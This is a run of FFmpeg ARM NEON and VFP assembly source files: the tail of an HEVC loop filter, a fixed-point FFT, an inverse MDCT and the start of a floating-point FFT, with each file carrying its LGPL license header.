vld1.8 {d16}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d22}, [r0], r1
vld1.8 {d24}, [r0], r1
vld1.8 {d26}, [r0], r1
vld1.8 {d28}, [r0], r1
vld1.8 {d30}, [r0], r1
sub r0, r0, r1, lsl #3
add r0, r1
hevc_loop_filter_luma_body
vst1.8 {d18}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d22}, [r0], r1
vst1.8 {d24}, [r0], r1
vst1.8 {d26}, [r0], r1
vst1.8 {d28}, [r0]
bypasswrite:
vpop {d8-d15}
pop {r5-r11}
bx lr
endfunc
function ff_hevc_v_loop_filter_chroma_neon, export=1
hevc_loop_filter_chroma_start
sub r0, #4
vld1.8 {d16}, [r0], r1
vld1.8 {d17}, [r0], r1
vld1.8 {d18}, [r0], r1
vld1.8 {d2}, [r0], r1
vld1.8 {d4}, [r0], r1
vld1.8 {d19}, [r0], r1
vld1.8 {d20}, [r0], r1
vld1.8 {d21}, [r0], r1
sub r0, r0, r1, lsl #3
transpose_8x8 d16, d17, d18, d2, d4, d19, d20, d21
hevc_loop_filter_chroma_body
transpose_8x8 d16, d17, d18, d2, d4, d19, d20, d21
vst1.8 {d16}, [r0], r1
vst1.8 {d17}, [r0], r1
vst1.8 {d18}, [r0], r1
vst1.8 {d2}, [r0], r1
vst1.8 {d4}, [r0], r1
vst1.8 {d19}, [r0], r1
vst1.8 {d20}, [r0], r1
vst1.8 {d21}, [r0]
bx lr
endfunc
function ff_hevc_h_loop_filter_chroma_neon, export=1
hevc_loop_filter_chroma_start
sub r0, r0, r1, lsl #1
vld1.8 {d18}, [r0], r1
vld1.8 {d2}, [r0], r1
vld1.8 {d4}, [r0], r1
vld1.8 {d19}, [r0]
sub r0, r0, r1, lsl #1
hevc_loop_filter_chroma_body
vst1.8 {d2}, [r0], r1
vst1.8 {d4}, [r0]
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 9,640
|
ffmpeg-3.0.2/libavcodec/arm/fft_fixed_neon.S
|
/*
* Copyright (c) 2011 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
.macro bflies d0, d1, r0, r1
vrev64.32 \r0, \d1 @ t5, t6, t1, t2
vhsub.s16 \r1, \d1, \r0 @ t1-t5, t2-t6, t5-t1, t6-t2
vhadd.s16 \r0, \d1, \r0 @ t1+t5, t2+t6, t5+t1, t6+t2
vext.16 \r1, \r1, \r1, #1 @ t2-t6, t5-t1, t6-t2, t1-t5
vtrn.32 \r0, \r1 @ t1+t5, t2+t6, t2-t6, t5-t1
@ t5, t6, t4, t3
vhsub.s16 \d1, \d0, \r0
vhadd.s16 \d0, \d0, \r0
.endm
.macro transform01 q0, q1, d3, c0, c1, r0, w0, w1
vrev32.16 \r0, \d3
vmull.s16 \w0, \d3, \c0
vmlal.s16 \w0, \r0, \c1
vshrn.s32 \d3, \w0, #15
bflies \q0, \q1, \w0, \w1
.endm
.macro transform2 d0, d1, d2, d3, q0, q1, c0, c1, c2, c3, \
r0, r1, w0, w1
vrev32.16 \r0, \d1
vrev32.16 \r1, \d3
vmull.s16 \w0, \d1, \c0
vmlal.s16 \w0, \r0, \c1
vmull.s16 \w1, \d3, \c2
vmlal.s16 \w1, \r1, \c3
vshrn.s32 \d1, \w0, #15
vshrn.s32 \d3, \w1, #15
bflies \q0, \q1, \w0, \w1
.endm
.macro fft4 d0, d1, r0, r1
vhsub.s16 \r0, \d0, \d1 @ t3, t4, t8, t7
vhsub.s16 \r1, \d1, \d0
vhadd.s16 \d0, \d0, \d1 @ t1, t2, t6, t5
vmov.i64 \d1, #0xffff00000000
vbit \r0, \r1, \d1
vrev64.16 \r1, \r0 @ t7, t8, t4, t3
vtrn.32 \r0, \r1 @ t3, t4, t7, t8
vtrn.32 \d0, \r0 @ t1, t2, t3, t4, t6, t5, t8, t7
vhsub.s16 \d1, \d0, \r0 @ r2, i2, r3, i1
vhadd.s16 \d0, \d0, \r0 @ r0, i0, r1, i3
.endm
.macro fft8 d0, d1, d2, d3, q0, q1, c0, c1, r0, r1, w0, w1
fft4 \d0, \d1, \r0, \r1
vtrn.32 \d0, \d1 @ z0, z2, z1, z3
vhadd.s16 \r0, \d2, \d3 @ t1, t2, t3, t4
vhsub.s16 \d3, \d2, \d3 @ z5, z7
vmov \d2, \r0
transform01 \q0, \q1, \d3, \c0, \c1, \r0, \w0, \w1
.endm
function fft4_neon
vld1.16 {d0-d1}, [r0]
fft4 d0, d1, d2, d3
vst1.16 {d0-d1}, [r0]
bx lr
endfunc
function fft8_neon
vld1.16 {d0-d3}, [r0,:128]
movrel r1, coefs
vld1.16 {d30}, [r1,:64]
vdup.16 d31, d30[0]
fft8 d0, d1, d2, d3, q0, q1, d31, d30, d20, d21, q8, q9
vtrn.32 d0, d1
vtrn.32 d2, d3
vst1.16 {d0-d3}, [r0,:128]
bx lr
endfunc
function fft16_neon
vld1.16 {d0-d3}, [r0,:128]!
vld1.16 {d4-d7}, [r0,:128]
movrel r1, coefs
sub r0, r0, #32
vld1.16 {d28-d31},[r1,:128]
vdup.16 d31, d28[0]
fft8 d0, d1, d2, d3, q0, q1, d31, d28, d20, d21, q8, q9
vswp d5, d6
fft4 q2, q3, q8, q9
vswp d5, d6
vtrn.32 q0, q1 @ z0, z4, z2, z6, z1, z5, z3, z7
vtrn.32 q2, q3 @ z8, z12,z10,z14,z9, z13,z11,z15
vswp d1, d2
vdup.16 d31, d28[0]
transform01 q0, q2, d5, d31, d28, d20, q8, q9
vdup.16 d26, d29[0]
vdup.16 d27, d30[0]
transform2 d2, d6, d3, d7, q1, q3, d26, d30, d27, d29, \
d20, d21, q8, q9
vtrn.32 q0, q1
vtrn.32 q2, q3
vst1.16 {d0-d3}, [r0,:128]!
vst1.16 {d4-d7}, [r0,:128]
bx lr
endfunc
function fft_pass_neon
push {r4,lr}
movrel lr, coefs + 24
vld1.16 {d30}, [lr,:64]
lsl r12, r2, #3
vmov d31, d30
add r3, r1, r2, lsl #2
mov lr, #-8
sub r3, r3, #2
mov r4, r0
vld1.16 {d27[]}, [r3,:16]
sub r3, r3, #6
vld1.16 {q0}, [r4,:128], r12
vld1.16 {q1}, [r4,:128], r12
vld1.16 {q2}, [r4,:128], r12
vld1.16 {q3}, [r4,:128], r12
vld1.16 {d28}, [r1,:64]!
vld1.16 {d29}, [r3,:64], lr
vswp d1, d2
vswp d5, d6
vtrn.32 d0, d1
vtrn.32 d4, d5
vdup.16 d25, d28[1]
vmul.s16 d27, d27, d31
transform01 q0, q2, d5, d25, d27, d20, q8, q9
b 2f
1:
mov r4, r0
vdup.16 d26, d29[0]
vld1.16 {q0}, [r4,:128], r12
vld1.16 {q1}, [r4,:128], r12
vld1.16 {q2}, [r4,:128], r12
vld1.16 {q3}, [r4,:128], r12
vld1.16 {d28}, [r1,:64]!
vld1.16 {d29}, [r3,:64], lr
vswp d1, d2
vswp d5, d6
vtrn.32 d0, d1
vtrn.32 d4, d5
vdup.16 d24, d28[0]
vdup.16 d25, d28[1]
vdup.16 d27, d29[3]
vmul.s16 q13, q13, q15
transform2 d0, d4, d1, d5, q0, q2, d24, d26, d25, d27, \
d16, d17, q9, q10
2:
vtrn.32 d2, d3
vtrn.32 d6, d7
vdup.16 d24, d28[2]
vdup.16 d26, d29[2]
vdup.16 d25, d28[3]
vdup.16 d27, d29[1]
vmul.s16 q13, q13, q15
transform2 d2, d6, d3, d7, q1, q3, d24, d26, d25, d27, \
d16, d17, q9, q10
vtrn.32 d0, d1
vtrn.32 d2, d3
vtrn.32 d4, d5
vtrn.32 d6, d7
vswp d1, d2
vswp d5, d6
mov r4, r0
vst1.16 {q0}, [r4,:128], r12
vst1.16 {q1}, [r4,:128], r12
vst1.16 {q2}, [r4,:128], r12
vst1.16 {q3}, [r4,:128], r12
add r0, r0, #16
subs r2, r2, #2
bgt 1b
pop {r4,pc}
endfunc
#define F_SQRT1_2 23170
#define F_COS_16_1 30274
#define F_COS_16_3 12540
const coefs, align=4
.short F_SQRT1_2, -F_SQRT1_2, -F_SQRT1_2, F_SQRT1_2
.short F_COS_16_1,-F_COS_16_1,-F_COS_16_1, F_COS_16_1
.short F_COS_16_3,-F_COS_16_3,-F_COS_16_3, F_COS_16_3
.short 1, -1, -1, 1
endconst
.macro def_fft n, n2, n4
function fft\n\()_neon
push {r4, lr}
mov r4, r0
bl fft\n2\()_neon
add r0, r4, #\n4*2*4
bl fft\n4\()_neon
add r0, r4, #\n4*3*4
bl fft\n4\()_neon
mov r0, r4
pop {r4, lr}
movrelx r1, X(ff_cos_\n\()_fixed)
mov r2, #\n4/2
b fft_pass_neon
endfunc
.endm
def_fft 32, 16, 8
def_fft 64, 32, 16
def_fft 128, 64, 32
def_fft 256, 128, 64
def_fft 512, 256, 128
def_fft 1024, 512, 256
def_fft 2048, 1024, 512
def_fft 4096, 2048, 1024
def_fft 8192, 4096, 2048
def_fft 16384, 8192, 4096
def_fft 32768, 16384, 8192
def_fft 65536, 32768, 16384
function ff_fft_fixed_calc_neon, export=1
ldr r2, [r0]
sub r2, r2, #2
movrel r3, fft_fixed_tab_neon
ldr r3, [r3, r2, lsl #2]
mov r0, r1
bx r3
endfunc
const fft_fixed_tab_neon, relocate=1
.word fft4_neon
.word fft8_neon
.word fft16_neon
.word fft32_neon
.word fft64_neon
.word fft128_neon
.word fft256_neon
.word fft512_neon
.word fft1024_neon
.word fft2048_neon
.word fft4096_neon
.word fft8192_neon
.word fft16384_neon
.word fft32768_neon
.word fft65536_neon
endconst
|
Akagi201/ffmpeg-xcode
| 11,182
|
ffmpeg-3.0.2/libavcodec/arm/mdct_vfp.S
|
/*
* Copyright (c) 2013 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
CONTEXT .req a1
ORIGOUT .req a2
IN .req a3
OUT .req v1
REVTAB .req v2
TCOS .req v3
TSIN .req v4
OLDFPSCR .req v5
J0 .req a2
J1 .req a4
J2 .req ip
J3 .req lr
REVTAB_HI .req v5
IN_HI .req v6
OUT_HI .req v6
TCOS_HI .req sl
TSIN_HI .req fp
.macro prerotation_innerloop
.set trig_lo, k
.set trig_hi, n4 - k - 2
.set in_lo, trig_lo * 2
.set in_hi, trig_hi * 2
vldr d8, [TCOS, #trig_lo*4] @ s16,s17
vldr d9, [TCOS, #trig_hi*4] @ s18,s19
vldr s0, [IN, #in_hi*4 + 12]
vldr s1, [IN, #in_hi*4 + 4]
vldr s2, [IN, #in_lo*4 + 12]
vldr s3, [IN, #in_lo*4 + 4]
vmul.f s8, s0, s16 @ vector operation
vldr d10, [TSIN, #trig_lo*4] @ s20,s21
vldr d11, [TSIN, #trig_hi*4] @ s22,s23
vldr s4, [IN, #in_lo*4]
vldr s5, [IN, #in_lo*4 + 8]
vldr s6, [IN, #in_hi*4]
vldr s7, [IN, #in_hi*4 + 8]
ldr J0, [REVTAB, #trig_lo*2]
vmul.f s12, s0, s20 @ vector operation
ldr J2, [REVTAB, #trig_hi*2]
mov J1, J0, lsr #16
and J0, J0, #255 @ halfword value will be < n4
vmls.f s8, s4, s20 @ vector operation
mov J3, J2, lsr #16
and J2, J2, #255 @ halfword value will be < n4
add J0, OUT, J0, lsl #3
vmla.f s12, s4, s16 @ vector operation
add J1, OUT, J1, lsl #3
add J2, OUT, J2, lsl #3
add J3, OUT, J3, lsl #3
vstr s8, [J0]
vstr s9, [J1]
vstr s10, [J2]
vstr s11, [J3]
vstr s12, [J0, #4]
vstr s13, [J1, #4]
vstr s14, [J2, #4]
vstr s15, [J3, #4]
.set k, k + 2
.endm
.macro prerotation_innerloop_rolled
vldmia TCOS!, {s16,s17}
vldmdb TCOS_HI!, {s18,s19}
vldr s0, [IN_HI, #-4]
vldr s1, [IN_HI, #-12]
vldr s2, [IN, #12]
vldr s3, [IN, #4]
vmul.f s8, s0, s16 @ vector operation
vldmia TSIN!, {s20,s21}
vldmdb TSIN_HI!, {s22,s23}
vldr s4, [IN]
vldr s5, [IN, #8]
vldr s6, [IN_HI, #-16]
vldr s7, [IN_HI, #-8]
vmul.f s12, s0, s20 @ vector operation
add IN, IN, #16
sub IN_HI, IN_HI, #16
ldrh J0, [REVTAB], #2
ldrh J1, [REVTAB], #2
vmls.f s8, s4, s20 @ vector operation
ldrh J3, [REVTAB_HI, #-2]!
ldrh J2, [REVTAB_HI, #-2]!
add J0, OUT, J0, lsl #3
vmla.f s12, s4, s16 @ vector operation
add J1, OUT, J1, lsl #3
add J2, OUT, J2, lsl #3
add J3, OUT, J3, lsl #3
vstr s8, [J0]
vstr s9, [J1]
vstr s10, [J2]
vstr s11, [J3]
vstr s12, [J0, #4]
vstr s13, [J1, #4]
vstr s14, [J2, #4]
vstr s15, [J3, #4]
.endm
.macro postrotation_innerloop tail, head
.set trig_lo_head, n8 - k - 2
.set trig_hi_head, n8 + k
.set out_lo_head, trig_lo_head * 2
.set out_hi_head, trig_hi_head * 2
.set trig_lo_tail, n8 - (k - 2) - 2
.set trig_hi_tail, n8 + (k - 2)
.set out_lo_tail, trig_lo_tail * 2
.set out_hi_tail, trig_hi_tail * 2
.if (k & 2) == 0
TCOS_D0_HEAD .req d10 @ s20,s21
TCOS_D1_HEAD .req d11 @ s22,s23
TCOS_S0_TAIL .req s24
.else
TCOS_D0_HEAD .req d12 @ s24,s25
TCOS_D1_HEAD .req d13 @ s26,s27
TCOS_S0_TAIL .req s20
.endif
.ifnc "\tail",""
vmls.f s8, s0, TCOS_S0_TAIL @ vector operation
.endif
.ifnc "\head",""
vldr d8, [TSIN, #trig_lo_head*4] @ s16,s17
vldr d9, [TSIN, #trig_hi_head*4] @ s18,s19
vldr TCOS_D0_HEAD, [TCOS, #trig_lo_head*4]
.endif
.ifnc "\tail",""
vmla.f s12, s4, TCOS_S0_TAIL @ vector operation
.endif
.ifnc "\head",""
vldr s0, [OUT, #out_lo_head*4]
vldr s1, [OUT, #out_lo_head*4 + 8]
vldr s2, [OUT, #out_hi_head*4]
vldr s3, [OUT, #out_hi_head*4 + 8]
vldr s4, [OUT, #out_lo_head*4 + 4]
vldr s5, [OUT, #out_lo_head*4 + 12]
vldr s6, [OUT, #out_hi_head*4 + 4]
vldr s7, [OUT, #out_hi_head*4 + 12]
.endif
.ifnc "\tail",""
vstr s8, [OUT, #out_lo_tail*4]
vstr s9, [OUT, #out_lo_tail*4 + 8]
vstr s10, [OUT, #out_hi_tail*4]
vstr s11, [OUT, #out_hi_tail*4 + 8]
.endif
.ifnc "\head",""
vmul.f s8, s4, s16 @ vector operation
.endif
.ifnc "\tail",""
vstr s12, [OUT, #out_hi_tail*4 + 12]
vstr s13, [OUT, #out_hi_tail*4 + 4]
vstr s14, [OUT, #out_lo_tail*4 + 12]
vstr s15, [OUT, #out_lo_tail*4 + 4]
.endif
.ifnc "\head",""
vmul.f s12, s0, s16 @ vector operation
vldr TCOS_D1_HEAD, [TCOS, #trig_hi_head*4]
.endif
.unreq TCOS_D0_HEAD
.unreq TCOS_D1_HEAD
.unreq TCOS_S0_TAIL
.ifnc "\head",""
.set k, k + 2
.endif
.endm
.macro postrotation_innerloop_rolled tail, head, tcos_s0_head, tcos_s1_head, tcos_s2_head, tcos_s3_head, tcos_s0_tail, out_offset_head, out_offset_tail
.ifnc "\tail",""
vmls.f s8, s0, \tcos_s0_tail @ vector operation
.endif
.ifnc "\head",""
vldmia TSIN!, {s16,s17}
vldmdb TSIN_HI!, {s18,s19}
vldmia TCOS!, {\tcos_s0_head,\tcos_s1_head}
.endif
.ifnc "\tail",""
vmla.f s12, s4, \tcos_s0_tail @ vector operation
.endif
.ifnc "\head",""
vldr s0, [OUT, #+\out_offset_head+0]
vldr s1, [OUT, #+\out_offset_head+8]
vldr s2, [OUT_HI, #-\out_offset_head-16]
vldr s3, [OUT_HI, #-\out_offset_head-8]
vldr s4, [OUT, #+\out_offset_head+4]
vldr s5, [OUT, #+\out_offset_head+12]
vldr s6, [OUT_HI, #-\out_offset_head-12]
vldr s7, [OUT_HI, #-\out_offset_head-4]
.endif
.ifnc "\tail",""
vstr s8, [OUT, #+\out_offset_tail+0]
vstr s9, [OUT, #+\out_offset_tail+8]
vstr s10, [OUT_HI, #-\out_offset_tail-16]
vstr s11, [OUT_HI, #-\out_offset_tail-8]
.endif
.ifnc "\head",""
vmul.f s8, s4, s16 @ vector operation
.endif
.ifnc "\tail",""
vstr s12, [OUT_HI, #-\out_offset_tail-4]
vstr s13, [OUT_HI, #-\out_offset_tail-12]
vstr s14, [OUT, #+\out_offset_tail+12]
vstr s15, [OUT, #+\out_offset_tail+4]
.endif
.ifnc "\head",""
vmul.f s12, s0, s16 @ vector operation
vldmdb TCOS_HI!, {\tcos_s2_head,\tcos_s3_head}
.endif
.endm
/* void ff_imdct_half_vfp(FFTContext *s,
* FFTSample *output,
* const FFTSample *input)
*/
function ff_imdct_half_vfp, export=1
ldr ip, [CONTEXT, #5*4] @ mdct_bits
teq ip, #6
bne 10f
.set n, 1<<6
.set n2, n/2
.set n4, n/4
.set n8, n/8
push {v1-v5,lr}
vpush {s16-s27}
fmrx OLDFPSCR, FPSCR
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
mov OUT, ORIGOUT
ldr REVTAB, [CONTEXT, #2*4]
ldr TCOS, [CONTEXT, #6*4]
ldr TSIN, [CONTEXT, #7*4]
.set k, 0
.rept n8/2
prerotation_innerloop
.endr
fmxr FPSCR, OLDFPSCR
mov a1, OUT
bl X(ff_fft16_vfp)
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
.set k, 0
postrotation_innerloop , head
.rept n8/2 - 1
postrotation_innerloop tail, head
.endr
postrotation_innerloop tail
fmxr FPSCR, OLDFPSCR
vpop {s16-s27}
pop {v1-v5,pc}
10:
push {v1-v6,sl,fp,lr}
vpush {s16-s27}
fmrx OLDFPSCR, FPSCR
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
mov lr, #1
mov OUT, ORIGOUT
ldr REVTAB, [CONTEXT, #2*4]
ldr TCOS, [CONTEXT, #6*4]
ldr TSIN, [CONTEXT, #7*4]
mov lr, lr, lsl ip
push {CONTEXT,OLDFPSCR}
add IN_HI, IN, lr, lsl #1
add REVTAB_HI, REVTAB, lr, lsr #1
add TCOS_HI, TCOS, lr
add TSIN_HI, TSIN, lr
0: prerotation_innerloop_rolled
teq IN, IN_HI
bne 0b
ldmia sp, {CONTEXT,OLDFPSCR}
mov ORIGOUT, OUT
fmxr FPSCR, OLDFPSCR
ldr ip, [CONTEXT, #9*4]
blx ip @ s->fft_calc(s, output)
pop {CONTEXT,OLDFPSCR}
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
ldr ip, [CONTEXT, #5*4] @ mdct_bits
fmxr FPSCR, lr
mov lr, #1
mov lr, lr, lsl ip
sub TCOS, TCOS, lr, lsr #1
sub TSIN, TSIN, lr, lsr #1
add OUT_HI, OUT, lr, lsl #1
add TCOS_HI, TCOS, lr
add TSIN_HI, TSIN, lr
postrotation_innerloop_rolled , head, s20, s21, s22, s23,, 0
b 1f
0: add OUT, OUT, #32
sub OUT_HI, OUT_HI, #32
postrotation_innerloop_rolled tail, head, s20, s21, s22, s23, s24, 0, -16
1: postrotation_innerloop_rolled tail, head, s24, s25, s26, s27, s20, 16, 0
teq TSIN, TSIN_HI
bne 0b
postrotation_innerloop_rolled tail,,,,,, s24,, 16
fmxr FPSCR, OLDFPSCR
vpop {s16-s27}
pop {v1-v6,sl,fp,pc}
endfunc
.unreq CONTEXT
.unreq ORIGOUT
.unreq IN
.unreq OUT
.unreq REVTAB
.unreq TCOS
.unreq TSIN
.unreq OLDFPSCR
.unreq J0
.unreq J1
.unreq J2
.unreq J3
.unreq REVTAB_HI
.unreq IN_HI
.unreq OUT_HI
.unreq TCOS_HI
.unreq TSIN_HI
|
Akagi201/ffmpeg-xcode
| 15,326
|
ffmpeg-3.0.2/libavcodec/arm/fft_neon.S
|
/*
* ARM NEON optimised FFT
*
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
* Copyright (c) 2009 Naotoshi Nojiri
*
* This algorithm (though not any of the implementation details) is
* based on libdjbfft by D. J. Bernstein.
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define M_SQRT1_2 0.70710678118654752440
function fft4_neon
vld1.32 {d0-d3}, [r0,:128]
vext.32 q8, q1, q1, #1 @ i2,r3 d3=i3,r2
vsub.f32 d6, d0, d1 @ r0-r1,i0-i1
vsub.f32 d7, d16, d17 @ r3-r2,i2-i3
vadd.f32 d4, d0, d1 @ r0+r1,i0+i1
vadd.f32 d5, d2, d3 @ i2+i3,r2+r3
vadd.f32 d1, d6, d7
vsub.f32 d3, d6, d7
vadd.f32 d0, d4, d5
vsub.f32 d2, d4, d5
vst1.32 {d0-d3}, [r0,:128]
bx lr
endfunc
function fft8_neon
mov r1, r0
vld1.32 {d0-d3}, [r1,:128]!
vld1.32 {d16-d19}, [r1,:128]
movw r2, #0x04f3 @ sqrt(1/2)
movt r2, #0x3f35
eor r3, r2, #1<<31
vdup.32 d31, r2
vext.32 q11, q1, q1, #1 @ i2,r3,i3,r2
vadd.f32 d4, d16, d17 @ r4+r5,i4+i5
vmov d28, r3, r2
vadd.f32 d5, d18, d19 @ r6+r7,i6+i7
vsub.f32 d17, d16, d17 @ r4-r5,i4-i5
vsub.f32 d19, d18, d19 @ r6-r7,i6-i7
vrev64.32 d29, d28
vadd.f32 d20, d0, d1 @ r0+r1,i0+i1
vadd.f32 d21, d2, d3 @ r2+r3,i2+i3
vmul.f32 d26, d17, d28 @ -a2r*w,a2i*w
vext.32 q3, q2, q2, #1
vmul.f32 d27, d19, d29 @ a3r*w,-a3i*w
vsub.f32 d23, d22, d23 @ i2-i3,r3-r2
vsub.f32 d22, d0, d1 @ r0-r1,i0-i1
vmul.f32 d24, d17, d31 @ a2r*w,a2i*w
vmul.f32 d25, d19, d31 @ a3r*w,a3i*w
vadd.f32 d0, d20, d21
vsub.f32 d2, d20, d21
vadd.f32 d1, d22, d23
vrev64.32 q13, q13
vsub.f32 d3, d22, d23
vsub.f32 d6, d6, d7
vadd.f32 d24, d24, d26 @ a2r+a2i,a2i-a2r t1,t2
vadd.f32 d25, d25, d27 @ a3r-a3i,a3i+a3r t5,t6
vadd.f32 d7, d4, d5
vsub.f32 d18, d2, d6
vext.32 q13, q12, q12, #1
vadd.f32 d2, d2, d6
vsub.f32 d16, d0, d7
vadd.f32 d5, d25, d24
vsub.f32 d4, d26, d27
vadd.f32 d0, d0, d7
vsub.f32 d17, d1, d5
vsub.f32 d19, d3, d4
vadd.f32 d3, d3, d4
vadd.f32 d1, d1, d5
vst1.32 {d16-d19}, [r1,:128]
vst1.32 {d0-d3}, [r0,:128]
bx lr
endfunc
function fft16_neon
movrel r1, mppm
vld1.32 {d16-d19}, [r0,:128]! @ q8{r0,i0,r1,i1} q9{r2,i2,r3,i3}
pld [r0, #32]
vld1.32 {d2-d3}, [r1,:128]
vext.32 q13, q9, q9, #1
vld1.32 {d22-d25}, [r0,:128]! @ q11{r4,i4,r5,i5} q12{r6,i5,r7,i7}
vadd.f32 d4, d16, d17
vsub.f32 d5, d16, d17
vadd.f32 d18, d18, d19
vsub.f32 d19, d26, d27
vadd.f32 d20, d22, d23
vsub.f32 d22, d22, d23
vsub.f32 d23, d24, d25
vadd.f32 q8, q2, q9 @ {r0,i0,r1,i1}
vadd.f32 d21, d24, d25
vmul.f32 d24, d22, d2
vsub.f32 q9, q2, q9 @ {r2,i2,r3,i3}
vmul.f32 d25, d23, d3
vuzp.32 d16, d17 @ {r0,r1,i0,i1}
vmul.f32 q1, q11, d2[1]
vuzp.32 d18, d19 @ {r2,r3,i2,i3}
vrev64.32 q12, q12
vadd.f32 q11, q12, q1 @ {t1a,t2a,t5,t6}
vld1.32 {d24-d27}, [r0,:128]! @ q12{r8,i8,r9,i9} q13{r10,i10,r11,i11}
vzip.32 q10, q11
vld1.32 {d28-d31}, [r0,:128] @ q14{r12,i12,r13,i13} q15{r14,i14,r15,i15}
vadd.f32 d0, d22, d20
vadd.f32 d1, d21, d23
vsub.f32 d2, d21, d23
vsub.f32 d3, d22, d20
sub r0, r0, #96
vext.32 q13, q13, q13, #1
vsub.f32 q10, q8, q0 @ {r4,r5,i4,i5}
vadd.f32 q8, q8, q0 @ {r0,r1,i0,i1}
vext.32 q15, q15, q15, #1
vsub.f32 q11, q9, q1 @ {r6,r7,i6,i7}
vswp d25, d26 @ q12{r8,i8,i10,r11} q13{r9,i9,i11,r10}
vadd.f32 q9, q9, q1 @ {r2,r3,i2,i3}
vswp d29, d30 @ q14{r12,i12,i14,r15} q15{r13,i13,i15,r14}
vadd.f32 q0, q12, q13 @ {t1,t2,t5,t6}
vadd.f32 q1, q14, q15 @ {t1a,t2a,t5a,t6a}
movrelx r2, X(ff_cos_16)
vsub.f32 q13, q12, q13 @ {t3,t4,t7,t8}
vrev64.32 d1, d1
vsub.f32 q15, q14, q15 @ {t3a,t4a,t7a,t8a}
vrev64.32 d3, d3
movrel r3, pmmp
vswp d1, d26 @ q0{t1,t2,t3,t4} q13{t6,t5,t7,t8}
vswp d3, d30 @ q1{t1a,t2a,t3a,t4a} q15{t6a,t5a,t7a,t8a}
vadd.f32 q12, q0, q13 @ {r8,i8,r9,i9}
vadd.f32 q14, q1, q15 @ {r12,i12,r13,i13}
vld1.32 {d4-d5}, [r2,:64]
vsub.f32 q13, q0, q13 @ {r10,i10,r11,i11}
vsub.f32 q15, q1, q15 @ {r14,i14,r15,i15}
vswp d25, d28 @ q12{r8,i8,r12,i12} q14{r9,i9,r13,i13}
vld1.32 {d6-d7}, [r3,:128]
vrev64.32 q1, q14
vmul.f32 q14, q14, d4[1]
vmul.f32 q1, q1, q3
vmla.f32 q14, q1, d5[1] @ {t1a,t2a,t5a,t6a}
vswp d27, d30 @ q13{r10,i10,r14,i14} q15{r11,i11,r15,i15}
vzip.32 q12, q14
vadd.f32 d0, d28, d24
vadd.f32 d1, d25, d29
vsub.f32 d2, d25, d29
vsub.f32 d3, d28, d24
vsub.f32 q12, q8, q0 @ {r8,r9,i8,i9}
vadd.f32 q8, q8, q0 @ {r0,r1,i0,i1}
vsub.f32 q14, q10, q1 @ {r12,r13,i12,i13}
mov r1, #32
vadd.f32 q10, q10, q1 @ {r4,r5,i4,i5}
vrev64.32 q0, q13
vmul.f32 q13, q13, d5[0]
vrev64.32 q1, q15
vmul.f32 q15, q15, d5[1]
vst2.32 {d16-d17},[r0,:128], r1
vmul.f32 q0, q0, q3
vst2.32 {d20-d21},[r0,:128], r1
vmul.f32 q1, q1, q3
vmla.f32 q13, q0, d5[0] @ {t1,t2,t5,t6}
vmla.f32 q15, q1, d4[1] @ {t1a,t2a,t5a,t6a}
vst2.32 {d24-d25},[r0,:128], r1
vst2.32 {d28-d29},[r0,:128]
vzip.32 q13, q15
sub r0, r0, #80
vadd.f32 d0, d30, d26
vadd.f32 d1, d27, d31
vsub.f32 d2, d27, d31
vsub.f32 d3, d30, d26
vsub.f32 q13, q9, q0 @ {r10,r11,i10,i11}
vadd.f32 q9, q9, q0 @ {r2,r3,i2,i3}
vsub.f32 q15, q11, q1 @ {r14,r15,i14,i15}
vadd.f32 q11, q11, q1 @ {r6,r7,i6,i7}
vst2.32 {d18-d19},[r0,:128], r1
vst2.32 {d22-d23},[r0,:128], r1
vst2.32 {d26-d27},[r0,:128], r1
vst2.32 {d30-d31},[r0,:128]
bx lr
endfunc
function fft_pass_neon
push {r4-r6,lr}
mov r6, r2 @ n
lsl r5, r2, #3 @ 2 * n * sizeof FFTSample
lsl r4, r2, #4 @ 2 * n * sizeof FFTComplex
lsl r2, r2, #5 @ 4 * n * sizeof FFTComplex
add r3, r2, r4
add r4, r4, r0 @ &z[o1]
add r2, r2, r0 @ &z[o2]
